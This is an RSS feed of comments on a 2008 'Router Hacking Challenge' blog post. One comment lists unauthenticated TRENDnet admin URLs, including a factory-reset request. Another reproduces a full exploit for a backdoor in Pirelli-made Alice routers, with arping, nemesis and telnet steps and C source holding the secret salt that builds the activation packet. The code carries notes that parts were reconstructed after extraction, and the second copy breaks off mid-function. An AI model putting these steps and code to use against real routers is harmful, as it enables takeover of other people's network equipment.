<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	>
<channel>
	<title>Comments on: Router Hacking Challenge</title>
	<atom:link href="http://www.gnucitizen.org/blog/router-hacking-challenge/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.gnucitizen.org/blog/router-hacking-challenge/</link>
	<description>Information Security Think Tank</description>
	<pubDate>Tue, 06 Jan 2009 01:49:25 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.7</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Kender</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-124581</link>
		<dc:creator>Kender</dc:creator>
		<pubDate>Fri, 05 Dec 2008 23:29:51 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-124581</guid>
		<description>Sure, I added a link to the source on my page. I never finished it.</description>
		<content:encoded><![CDATA[<p>Sure, I added a link to the source on my page. I never finished it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: jjacks</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-124545</link>
		<dc:creator>jjacks</dc:creator>
		<pubDate>Mon, 01 Dec 2008 19:31:31 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-124545</guid>
		<description>Hi Kender, could you reveal the spt.dat decompressor source code? I'm trying to use it with a 120KB file, getting an Index out of range exception all the time. How long was your spt.dat?</description>
		<content:encoded><![CDATA[<p>Hi Kender, could you reveal the spt.dat decompressor source code? I&#8217;m trying to use it with a 120KB file, getting an Index out of range exception all the time. How long was your spt.dat?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: holddigga</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-124504</link>
		<dc:creator>holddigga</dc:creator>
		<pubDate>Sat, 29 Nov 2008 04:39:06 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-124504</guid>
		<description>The TRENDnet TEW-633GR doesn't authenticate past the first page, i.e. if you enter &lt;code&gt;/Basic/Wireless.shtml&lt;/code&gt; you will be able to modify the wireless settings without entering a password! This will also get you to any other config page within the router. Also if you enter &lt;code&gt;/reboot.cgi?reset=true&lt;/code&gt;, you will reset the router to factory defaults.</description>
		<content:encoded><![CDATA[<p>The TRENDnet TEW-633GR doesn&#8217;t authenticate past the first page, i.e. if you enter <code>/Basic/Wireless.shtml</code> you will be able to modify the wireless settings without entering a password! This will also get you to any other config page within the router. Also if you enter <code>/reboot.cgi?reset=true</code>, you will reset the router to factory defaults.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Excalibur</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-124347</link>
		<dc:creator>Excalibur</dc:creator>
		<pubDate>Sat, 15 Nov 2008 12:47:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-124347</guid>
		<description>Hmmm...Once I'm logged in, click "File-Page Save As", select "webpage complete" and you can just double-click the htm file to get in...wonder if this would work on another router the same as mine using my htm file...</description>
		<content:encoded><![CDATA[<p>Hmmm&#8230;Once I&#8217;m logged in, click &#8220;File-Page Save As&#8221;, select &#8220;webpage complete&#8221; and you can just double-click the htm file to get in&#8230;wonder if this would work on another router the same as mine using my htm file&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: saxdax &#38; drpepperONE</title>
		<link>http://www.gnucitizen.org/blog/router-hacking-challenge/comment-page-3/#comment-124046</link>
		<dc:creator>saxdax &#38; drpepperONE</dc:creator>
		<pubDate>Mon, 13 Oct 2008 23:30:33 +0000</pubDate>
		<guid isPermaLink="false">http://www.gnucitizen.org/blog/router-hacking-challenge#comment-124046</guid>
		<description>&lt;pre&gt;&lt;code&gt;#############################################################################################

				saxdax &#38; drpepperONE


Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface
with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactured
by Pirelli based on Broadcom platform.

#############################################################################################

                        saxdax &#38; drpepperONE

Router Vendor:		Alice Telecom Italia CPE Modem/Routers manufactured by Pirelli
				based on Broadcom platform.
              		
Model Affected:		AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2 plus]
				AG2P-AG3[Alice Gate W2+]/AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi]
              		
Firmware Version:		All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware versions are affected.

Platforms:    		Customized Linux version 2.6.8.1 on Broadcom BCM96348 chipset.

Vulnerability:          enable telnet/ftp/tftp and web-admin from internal lan.		

Exploitation: 		internal network lan, versus Router 

Date:         		13 Oct 2008

Authors:       		saxdax &#38; drpepperONE

e-mail: 			saxdax2@gmail.com		drpepppperone@gmail.com

Risk: 			medium&#62;low
        
#############################################################################################

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix

#############################################################################################

===============
1) Introduction
===============

Telecom Italia is the most important Italian ISP offering an ADSL service named "Alice".
Telecom Italia rents out, with the "Alice Adsl" service, different CPE Modem/Routers, among which
the affected ones.
The interface to configure these modems is made extremely poor by the provider to ensure
more control.
There's no way to enable telnet, ftp, tftp or more advanced web pages from the web interface.

http://www.telecomitalia.com/
http://adsl.alice.it/

#############################################################################################

================
2) Vulnerability
================

An attacker can activate and get unauthorized access to the router's administration
interface and telnet/ftp/tftp services from the internal network.

Every user in the LAN (or Wireless LAN) can nevertheless have access to the router's
administration interface and telnet/ftp/tftp!

If an attacker can get access to the administrator interface and login, he has full control
over the router's configuration.

#############################################################################################


==============
3) The Exploit
==============

To enable the telnet/ftp/tftp and web-admin interface it is necessary to send a special
IP packet to the router's specific IP 192.168.1.1.
This works only from the internal LAN, where an attacker has an IP like 192.168.1.XX.
The IP packet sent to the router must have the following features:

1) IP protocol number 255 (there's a RAW SOCKET listening on the router)
2) Payload size 8 bytes
3) The payload is the first 8 bytes of a salted MD5 of the MAC address of device br0
4) br0 in these modems has the same MAC as eth0

When the modem receives the packet all services will be enabled.


Example:


From a GNU/LINUX distrib:

1) Retrieve br0 MAC address:

arping -I eth0 -c 2 192.168.1.1

ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)


2) Calculate the special MD5 hash from the br0 MAC address: create a 6-byte hex file with the MAC address,
	run the application below and copy the output hash.
	http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html

3) Send an IP packet to router IP 192.168.1.1 with the 8-byte payload file (with the tool you like)

	i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex


4) Telnet to the router:

	telnet 192.168.1.1

	BCM96348 ADSL Router
	Login: admin
	Password: 



#############################################################################################


===========
4) The Code
===========

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the payload of the ip packet   */
/* the mac must be in a hex file and has to be passed as argument to the program */

/* header names were lost in extraction; reconstructed as the standard C headers this code needs */
#include &#60;stdio.h&#62;
#include &#60;string.h&#62;
#include &#60;stdlib.h&#62;
#include "md5.h"   /* Christophe Devine's md5.h: defines md5_context, uint8, uint32 */


/*
 *  RFC 1321 compliant MD5 implementation
 *
 *  Copyright (C) 2001-2003  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */



/* the two byte-order macros were garbled in extraction; restored from Devine's md5.c */
#define GET_UINT32(n,b,i)                       \
{                                               \
    (n) = ( (uint32) (b)[(i)    ]       )       \
        &#124; ( (uint32) (b)[(i) + 1] &#60;&#60;  8 )       \
        &#124; ( (uint32) (b)[(i) + 2] &#60;&#60; 16 )       \
        &#124; ( (uint32) (b)[(i) + 3] &#60;&#60; 24 );      \
}

#define PUT_UINT32(n,b,i)                       \
{                                               \
    (b)[(i)    ] = (uint8) ( (n)       );       \
    (b)[(i) + 1] = (uint8) ( (n) &#62;&#62;  8 );       \
    (b)[(i) + 2] = (uint8) ( (n) &#62;&#62; 16 );       \
    (b)[(i) + 3] = (uint8) ( (n) &#62;&#62; 24 );       \
}

void md5_starts( md5_context *ctx )
{
    ctx-&#62;total[0] = 0;
    ctx-&#62;total[1] = 0;

    ctx-&#62;state[0] = 0x67452301;
    ctx-&#62;state[1] = 0xEFCDAB89;
    ctx-&#62;state[2] = 0x98BADCFE;
    ctx-&#62;state[3] = 0x10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
    uint32 X[16], A, B, C, D;

    GET_UINT32( X[0],  data,  0 );
    GET_UINT32( X[1],  data,  4 );
    GET_UINT32( X[2],  data,  8 );
    GET_UINT32( X[3],  data, 12 );
    GET_UINT32( X[4],  data, 16 );
    GET_UINT32( X[5],  data, 20 );
    GET_UINT32( X[6],  data, 24 );
    GET_UINT32( X[7],  data, 28 );
    GET_UINT32( X[8],  data, 32 );
    GET_UINT32( X[9],  data, 36 );
    GET_UINT32( X[10], data, 40 );
    GET_UINT32( X[11], data, 44 );
    GET_UINT32( X[12], data, 48 );
    GET_UINT32( X[13], data, 52 );
    GET_UINT32( X[14], data, 56 );
    GET_UINT32( X[15], data, 60 );

/* 32-bit left rotate (restored from Devine's md5.c) */
#define S(x,n) ((x &#60;&#60; n) &#124; ((x &#38; 0xFFFFFFFF) &#62;&#62; (32 - n)))

#define P(a,b,c,d,k,s,t)                                \
{                                                       \
    a += F(b,c,d) + X[k] + t; a = S(a,s) + b;           \
}

    A = ctx-&#62;state[0];
    B = ctx-&#62;state[1];
    C = ctx-&#62;state[2];
    D = ctx-&#62;state[3];

#define F(x,y,z) (z ^ (x &#38; (y ^ z)))

    P( A, B, C, D,  0,  7, 0xD76AA478 );
    P( D, A, B, C,  1, 12, 0xE8C7B756 );
    P( C, D, A, B,  2, 17, 0x242070DB );
    P( B, C, D, A,  3, 22, 0xC1BDCEEE );
    P( A, B, C, D,  4,  7, 0xF57C0FAF );
    P( D, A, B, C,  5, 12, 0x4787C62A );
    P( C, D, A, B,  6, 17, 0xA8304613 );
    P( B, C, D, A,  7, 22, 0xFD469501 );
    P( A, B, C, D,  8,  7, 0x698098D8 );
    P( D, A, B, C,  9, 12, 0x8B44F7AF );
    P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
    P( B, C, D, A, 11, 22, 0x895CD7BE );
    P( A, B, C, D, 12,  7, 0x6B901122 );
    P( D, A, B, C, 13, 12, 0xFD987193 );
    P( C, D, A, B, 14, 17, 0xA679438E );
    P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z &#38; (x ^ y)))

    P( A, B, C, D,  1,  5, 0xF61E2562 );
    P( D, A, B, C,  6,  9, 0xC040B340 );
    P( C, D, A, B, 11, 14, 0x265E5A51 );
    P( B, C, D, A,  0, 20, 0xE9B6C7AA );
    P( A, B, C, D,  5,  5, 0xD62F105D );
    P( D, A, B, C, 10,  9, 0x02441453 );
    P( C, D, A, B, 15, 14, 0xD8A1E681 );
    P( B, C, D, A,  4, 20, 0xE7D3FBC8 );
    P( A, B, C, D,  9,  5, 0x21E1CDE6 );
    P( D, A, B, C, 14,  9, 0xC33707D6 );
    P( C, D, A, B,  3, 14, 0xF4D50D87 );
    P( B, C, D, A,  8, 20, 0x455A14ED );
    P( A, B, C, D, 13,  5, 0xA9E3E905 );
    P( D, A, B, C,  2,  9, 0xFCEFA3F8 );
    P( C, D, A, B,  7, 14, 0x676F02D9 );
    P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F
    
#define F(x,y,z) (x ^ y ^ z)

    P( A, B, C, D,  5,  4, 0xFFFA3942 );
    P( D, A, B, C,  8, 11, 0x8771F681 );
    P( C, D, A, B, 11, 16, 0x6D9D6122 );
    P( B, C, D, A, 14, 23, 0xFDE5380C );
    P( A, B, C, D,  1,  4, 0xA4BEEA44 );
    P( D, A, B, C,  4, 11, 0x4BDECFA9 );
    P( C, D, A, B,  7, 16, 0xF6BB4B60 );
    P( B, C, D, A, 10, 23, 0xBEBFBC70 );
    P( A, B, C, D, 13,  4, 0x289B7EC6 );
    P( D, A, B, C,  0, 11, 0xEAA127FA );
    P( C, D, A, B,  3, 16, 0xD4EF3085 );
    P( B, C, D, A,  6, 23, 0x04881D05 );
    P( A, B, C, D,  9,  4, 0xD9D4D039 );
    P( D, A, B, C, 12, 11, 0xE6DB99E5 );
    P( C, D, A, B, 15, 16, 0x1FA27CF8 );
    P( B, C, D, A,  2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x &#124; ~z))

    P( A, B, C, D,  0,  6, 0xF4292244 );
    P( D, A, B, C,  7, 10, 0x432AFF97 );
    P( C, D, A, B, 14, 15, 0xAB9423A7 );
    P( B, C, D, A,  5, 21, 0xFC93A039 );
    P( A, B, C, D, 12,  6, 0x655B59C3 );
    P( D, A, B, C,  3, 10, 0x8F0CCC92 );
    P( C, D, A, B, 10, 15, 0xFFEFF47D );
    P( B, C, D, A,  1, 21, 0x85845DD1 );
    P( A, B, C, D,  8,  6, 0x6FA87E4F );
    P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
    P( C, D, A, B,  6, 15, 0xA3014314 );
    P( B, C, D, A, 13, 21, 0x4E0811A1 );
    P( A, B, C, D,  4,  6, 0xF7537E82 );
    P( D, A, B, C, 11, 10, 0xBD3AF235 );
    P( C, D, A, B,  2, 15, 0x2AD7D2BB );
    P( B, C, D, A,  9, 21, 0xEB86D391 );

#undef F

    ctx-&#62;state[0] += A;
    ctx-&#62;state[1] += B;
    ctx-&#62;state[2] += C;
    ctx-&#62;state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
    uint32 left, fill;

    if( ! length ) return;

    left = ctx-&#62;total[0] &#38; 0x3F;
    fill = 64 - left;

    ctx-&#62;total[0] += length;
    ctx-&#62;total[0] &#38;= 0xFFFFFFFF;

    if( ctx-&#62;total[0] &#60; length ) ctx-&#62;total[1]++;

    if( left &#38;&#38; length &#62;= fill )
    {
        memcpy( (void *) (ctx-&#62;buffer + left),
                (void *) input, fill );
        md5_process( ctx, ctx-&#62;buffer );
        length -= fill;
        input  += fill;
        left = 0;
    }

    while( length &#62;= 64 )
    {
        md5_process( ctx, input );
        length -= 64;
        input  += 64;
    }

    if( length )
    {
        memcpy( (void *) (ctx-&#62;buffer + left),
                (void *) input, length );
    }
}

static uint8 md5_padding[64] =
{
 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
    uint32 last, padn;
    uint32 high, low;
    uint8 msglen[8];
	

    /* bit length of the message, then padding and final digest (restored from Devine's md5.c) */
    high = ( ctx-&#62;total[0] &#62;&#62; 29 )
         &#124; ( ctx-&#62;total[1] &#60;&#60;  3 );
    low  = ( ctx-&#62;total[0] &#60;&#60;  3 );

    PUT_UINT32( low,  msglen, 0 );
    PUT_UINT32( high, msglen, 4 );

    last = ctx-&#62;total[0] &#38; 0x3F;
    padn = ( last &#60; 56 ) ? ( 56 - last ) : ( 120 - last );

    md5_update( ctx, md5_padding, padn );
    md5_update( ctx, msglen, 8 );

    PUT_UINT32( ctx-&#62;state[0], digest,  0 );
    PUT_UINT32( ctx-&#62;state[1], digest,  4 );
    PUT_UINT32( ctx-&#62;state[2], digest,  8 );
    PUT_UINT32( ctx-&#62;state[3], digest, 12 );
}

//#ifdef TEST



/*
 * those are the standard RFC 1321 test vectors
 */

static char *msg[] = 
{
    "",
    "a",
    "abc",
    "message digest",
    "abcdefghijklmnopqrstuvwxyz",
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    "12345678901234567890123456789012345678901234567890123456789012" \
        "345678901234567890"
};

static char *val[] =
{
    "d41d8cd98f00b204e9800998ecf8427e",
    "0cc175b9c0f1b6a831c399e269772661",
    "900150983cd24fb0d6963f7d28e17f72",
    "f96b697d7cb7938d525a2f31aaf161d0",
    "c3fcd3d76192e4007dfb496cca67e13b",
    "d174ab98d277d9f5a5611c2c9f419d9f",
    "57edf4a22be3c955ac49da2e2107b67a"
};

static char saltOrig[] =
{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, 0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33};

int main( int argc, char *argv[] )
{
    FILE *f;
    int i, j;
    char output[33];
    md5_context ctx;
    unsigned char buf[1000];
    unsigned char md5sum[16];
	unsigned char salt[20];
	
	printf( "****************************\n");
	printf( "Alice BackDoor hash creator \n");
	printf( "by saxdax and drPepperOne   \n");
	printf( "****************************\n\n");
    
	/* argument check, file open and read loop were lost in extraction;
	   reconstructed following the fread loop of Devine's md5.c test main */
	if( argc &#60; 2 )
	{
		printf( "usage: %s &#60;mac.hex&#62;\n", argv[0] );
		return( 1 );
	}

	if( ! ( f = fopen( argv[1], "rb" ) ) )
	{
		printf( "cannot open %s\n", argv[1] );
		return( 1 );
	}

	md5_starts( &#38;ctx );

	while( ( i = fread( buf, 1, sizeof( buf ), f ) ) &#62; 0 )
    {
        md5_update( &#38;ctx, buf, i );
    }

	fclose( f );
	
	memcpy(salt, saltOrig, 20);
	
	md5_update( &#38;ctx, salt, 20 );

    md5_finish( &#38;ctx, md5sum );
	
	printf("Payload is: ");
    for( j = 0; j &#60; 8; j++ )
    {
        printf( "%02x", md5sum[j] );
    }

    return( 0 );
}







#############################################################################################

======
5) Fix
======


Actually at 13 Oct 2008 NO FIX available

#############################################################################################&lt;/code&gt;&lt;/pre&gt;</description>
		<content:encoded><![CDATA[<pre><code>#############################################################################################

				saxdax &amp; drpepperONE

Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin interface
with Admin privileges, from internal network lan on Alice ADSL CPE Modem/Router, manufactured
by Pirelli based on Broadcom platform.

#############################################################################################

                        saxdax &amp; drpepperONE

Router Vendor:		Alice Telecom Italia CPE Modem/Routers manufactured by Pirelli
				based on Broadcom platform.

Model Affected:		AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2 plus]
				AG2P-AG3[Alice Gate W2+]/AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi]

Firmware Version:		All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware versions are affected.

Platforms:    		Customized Linux version 2.6.8.1 on Broadcom BCM96348 chipset.

Vulnerability:          enable telnet/ftp/tftp and web-admin from internal lan.		

Exploitation: 		internal network lan, versus Router 

Date:         		13 Oct 2008

Authors:       		saxdax &amp; drpepperONE

e-mail: 			<a href="mailto:saxdax2@gmail.com">saxdax2@gmail.com</a>		<a href="mailto:drpepppperone@gmail.com">drpepppperone@gmail.com</a>

Risk: 			medium&gt;low

#############################################################################################

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix

#############################################################################################

===============
1) Introduction
===============

Telecom Italia is the most important Italian ISP offering an ADSL service named "Alice".
Telecom Italia rents out, with the "Alice Adsl" service, different CPE Modem/Routers, among which
the affected ones.
The interface to configure these modems is made extremely poor by the provider to ensure
more control.
There's no way to enable telnet, ftp, tftp or more advanced web pages from the web interface.

<a href="http://www.telecomitalia.com/" rel="nofollow">http://www.telecomitalia.com/</a>
<a href="http://adsl.alice.it/" rel="nofollow">http://adsl.alice.it/</a>

#############################################################################################

================
2) Vulnerability
================

An attacker can activate and get unauthorized access to the router's administration
interface and telnet/ftp/tftp services from the internal network.

Every user in the LAN (or Wireless LAN) can nevertheless have access to the router's
administration interface and telnet/ftp/tftp!

If an attacker can get access to the administrator interface and login, he has full control
over the router's configuration.

#############################################################################################

==============
3) The Exploit
==============

To enable the telnet/ftp/tftp and web-admin interface it is necessary to send a special
IP packet to the router's specific IP 192.168.1.1.
This works only from the internal LAN, where an attacker has an IP like 192.168.1.XX.
The IP packet sent to the router must have the following features:

1) IP protocol number 255 (there's a RAW SOCKET listening on the router)
2) Payload size 8 bytes
3) The payload is the first 8 bytes of a salted MD5 of the MAC address of device br0
4) br0 in these modems has the same MAC as eth0

When the modem receives the packet all services will be enabled.

Example:

From a GNU/LINUX distrib:

1) Retrieve br0 MAC address:

arping -I eth0 -c 2 192.168.1.1

ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)

2) Calculate the special MD5 hash from the br0 MAC address: create a 6-byte hex file with the MAC address,
	run the application below and copy the output hash.
	<a href="http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html" rel="nofollow">http://rapidshare.com/files/15.....r.zip.html</a>

3) Send an IP packet to router IP 192.168.1.1 with the 8-byte payload file (with the tool you like)

	i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

4) Telnet to the router:

	telnet 192.168.1.1

	BCM96348 ADSL Router
	Login: admin
	Password: 

#############################################################################################

===========
4) The Code
===========

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the payload of the ip packet   */
/* the mac must be in a hex file and has to be passed as argument to the program */

/* header names were lost in extraction; reconstructed as the standard C headers this code needs */
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include "md5.h"   /* Christophe Devine's md5.h: defines md5_context, uint8, uint32 */

/*
 *  RFC 1321 compliant MD5 implementation
 *
 *  Copyright (C) 2001-2003  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/* the two byte-order macros were garbled in extraction; restored from Devine's md5.c */
#define GET_UINT32(n,b,i)                       \
{                                               \
    (n) = ( (uint32) (b)[(i)    ]       )       \
        | ( (uint32) (b)[(i) + 1] &lt;&lt;  8 )       \
        | ( (uint32) (b)[(i) + 2] &lt;&lt; 16 )       \
        | ( (uint32) (b)[(i) + 3] &lt;&lt; 24 );      \
}

#define PUT_UINT32(n,b,i)                       \
{                                               \
    (b)[(i)    ] = (uint8) ( (n)       );       \
    (b)[(i) + 1] = (uint8) ( (n) &gt;&gt;  8 );       \
    (b)[(i) + 2] = (uint8) ( (n) &gt;&gt; 16 );       \
    (b)[(i) + 3] = (uint8) ( (n) &gt;&gt; 24 );       \
}

void md5_starts( md5_context *ctx )
{
    ctx-&gt;total[0] = 0;
    ctx-&gt;total[1] = 0;

    ctx-&gt;state[0] = 0x67452301;
    ctx-&gt;state[1] = 0xEFCDAB89;
    ctx-&gt;state[2] = 0x98BADCFE;
    ctx-&gt;state[3] = 0x10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
    uint32 X[16], A, B, C, D;

    GET_UINT32( X[0],  data,  0 );
    GET_UINT32( X[1],  data,  4 );
    GET_UINT32( X[2],  data,  8 );
    GET_UINT32( X[3],  data, 12 );
    GET_UINT32( X[4],  data, 16 );
    GET_UINT32( X[5],  data, 20 );
    GET_UINT32( X[6],  data, 24 );
    GET_UINT32( X[7],  data, 28 );
    GET_UINT32( X[8],  data, 32 );
    GET_UINT32( X[9],  data, 36 );
    GET_UINT32( X[10], data, 40 );
    GET_UINT32( X[11], data, 44 );
    GET_UINT32( X[12], data, 48 );
    GET_UINT32( X[13], data, 52 );
    GET_UINT32( X[14], data, 56 );
    GET_UINT32( X[15], data, 60 );

/* 32-bit left rotate (restored from Devine's md5.c) */
#define S(x,n) ((x &lt;&lt; n) | ((x &amp; 0xFFFFFFFF) &gt;&gt; (32 - n)))

#define P(a,b,c,d,k,s,t)                                \
{                                                       \
    a += F(b,c,d) + X[k] + t; a = S(a,s) + b;           \
}

    A = ctx-&gt;state[0];
    B = ctx-&gt;state[1];
    C = ctx-&gt;state[2];
    D = ctx-&gt;state[3];

#define F(x,y,z) (z ^ (x &amp; (y ^ z)))

    P( A, B, C, D,  0,  7, 0xD76AA478 );
    P( D, A, B, C,  1, 12, 0xE8C7B756 );
    P( C, D, A, B,  2, 17, 0x242070DB );
    P( B, C, D, A,  3, 22, 0xC1BDCEEE );
    P( A, B, C, D,  4,  7, 0xF57C0FAF );
    P( D, A, B, C,  5, 12, 0x4787C62A );
    P( C, D, A, B,  6, 17, 0xA8304613 );
    P( B, C, D, A,  7, 22, 0xFD469501 );
    P( A, B, C, D,  8,  7, 0x698098D8 );
    P( D, A, B, C,  9, 12, 0x8B44F7AF );
    P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
    P( B, C, D, A, 11, 22, 0x895CD7BE );
    P( A, B, C, D, 12,  7, 0x6B901122 );
    P( D, A, B, C, 13, 12, 0xFD987193 );
    P( C, D, A, B, 14, 17, 0xA679438E );
    P( B, C, D, A, 15, 22, 0x49B40821 );

#undef F

#define F(x,y,z) (y ^ (z &amp; (x ^ y)))

    P( A, B, C, D,  1,  5, 0xF61E2562 );
    P( D, A, B, C,  6,  9, 0xC040B340 );
    P( C, D, A, B, 11, 14, 0x265E5A51 );
    P( B, C, D, A,  0, 20, 0xE9B6C7AA );
    P( A, B, C, D,  5,  5, 0xD62F105D );
    P( D, A, B, C, 10,  9, 0x02441453 );
    P( C, D, A, B, 15, 14, 0xD8A1E681 );
    P( B, C, D, A,  4, 20, 0xE7D3FBC8 );
    P( A, B, C, D,  9,  5, 0x21E1CDE6 );
    P( D, A, B, C, 14,  9, 0xC33707D6 );
    P( C, D, A, B,  3, 14, 0xF4D50D87 );
    P( B, C, D, A,  8, 20, 0x455A14ED );
    P( A, B, C, D, 13,  5, 0xA9E3E905 );
    P( D, A, B, C,  2,  9, 0xFCEFA3F8 );
    P( C, D, A, B,  7, 14, 0x676F02D9 );
    P( B, C, D, A, 12, 20, 0x8D2A4C8A );

#undef F

#define F(x,y,z) (x ^ y ^ z)

    P( A, B, C, D,  5,  4, 0xFFFA3942 );
    P( D, A, B, C,  8, 11, 0x8771F681 );
    P( C, D, A, B, 11, 16, 0x6D9D6122 );
    P( B, C, D, A, 14, 23, 0xFDE5380C );
    P( A, B, C, D,  1,  4, 0xA4BEEA44 );
    P( D, A, B, C,  4, 11, 0x4BDECFA9 );
    P( C, D, A, B,  7, 16, 0xF6BB4B60 );
    P( B, C, D, A, 10, 23, 0xBEBFBC70 );
    P( A, B, C, D, 13,  4, 0x289B7EC6 );
    P( D, A, B, C,  0, 11, 0xEAA127FA );
    P( C, D, A, B,  3, 16, 0xD4EF3085 );
    P( B, C, D, A,  6, 23, 0x04881D05 );
    P( A, B, C, D,  9,  4, 0xD9D4D039 );
    P( D, A, B, C, 12, 11, 0xE6DB99E5 );
    P( C, D, A, B, 15, 16, 0x1FA27CF8 );
    P( B, C, D, A,  2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

    P( A, B, C, D,  0,  6, 0xF4292244 );
    P( D, A, B, C,  7, 10, 0x432AFF97 );
    P( C, D, A, B, 14, 15, 0xAB9423A7 );
    P( B, C, D, A,  5, 21, 0xFC93A039 );
    P( A, B, C, D, 12,  6, 0x655B59C3 );
    P( D, A, B, C,  3, 10, 0x8F0CCC92 );
    P( C, D, A, B, 10, 15, 0xFFEFF47D );
    P( B, C, D, A,  1, 21, 0x85845DD1 );
    P( A, B, C, D,  8,  6, 0x6FA87E4F );
    P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
    P( C, D, A, B,  6, 15, 0xA3014314 );
    P( B, C, D, A, 13, 21, 0x4E0811A1 );
    P( A, B, C, D,  4,  6, 0xF7537E82 );
    P( D, A, B, C, 11, 10, 0xBD3AF235 );
    P( C, D, A, B,  2, 15, 0x2AD7D2BB );
    P( B, C, D, A,  9, 21, 0xEB86D391 );

#undef F

    ctx-&gt;state[0] += A;
    ctx-&gt;state[1] += B;
    ctx-&gt;state[2] += C;
    ctx-&gt;state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
    uint32 left, fill;

    if( ! length ) return;

    left = ctx-&gt;total[0] &amp; 0x3F;
    fill = 64 - left;

    ctx-&gt;total[0] += length;
    ctx-&gt;total[0] &amp;= 0xFFFFFFFF;

